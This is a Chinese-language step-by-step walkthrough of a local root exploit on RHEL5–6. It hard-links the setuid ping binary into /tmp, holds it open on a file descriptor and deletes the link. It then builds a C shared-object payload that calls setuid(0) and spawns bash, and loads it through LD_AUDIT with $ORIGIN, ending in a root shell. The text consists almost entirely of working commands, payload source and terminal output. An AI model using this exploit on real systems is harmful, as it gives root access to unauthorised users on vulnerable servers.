适用系统为RHEL5 ---- RHEL6
这个漏洞利用的是文件的特殊权限位,下面是过程
首先需要登录系统,在/tmp目录下创建任意目录
[test@linux-6-node-1 tmp]$ ll -d /tmp/ drwxrwxrwt. 6 root root 4096 Sep 24 20:06 /tmp/ [test@linux-6-node-1 tmp]$ mkdir exploit [test@linux-6-node-1 tmp]$ ll -d exploit drwxrwxr-x. 2 gl gl 4096 Sep 24 20:31 exploit
link一个拥有suid的命令文件到新建目录下
[test@linux-6-node-1 tmp]$ ll /bin/ping -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping [test@linux-6-node-1 tmp]$ ln /bin/ping /tmp/exploit/target [test@linux-6-node-1 tmp]$ ll !$ ll /bin/ping -rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping
载入内存
[test@linux-6-node-1 tmp]$ exec 3< /tmp/exploit/target [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3 lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target
删除链接文件
[test@linux-6-node-1 tmp]$ rm -fr /tmp/exploit/ [test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3 lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target (deleted)
编写C语言脚本,进行提权
[test@linux-6-node-1 tmp]$ vim payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
编译脚本
[test@linux-6-node-1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c [test@linux-6-node-1 tmp]$ ll /tmp/exploit -rwxrwxr-x. 1 gl gl 6020 Sep 24 20:25 /tmp/exploit
执行脚本,进行提权
[test@linux-6-node-1 tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@linux-6-node-1 ~]#
可以看到命令提示符已经从$变为#,而#代表什么大家都懂的,用whoami看一下
[root@linux-6-node-1 ~]# whoami root
提权成功
这个不用很担心,前提必须登录服务器才能进行操作,平时安全做好,能避免这种情况。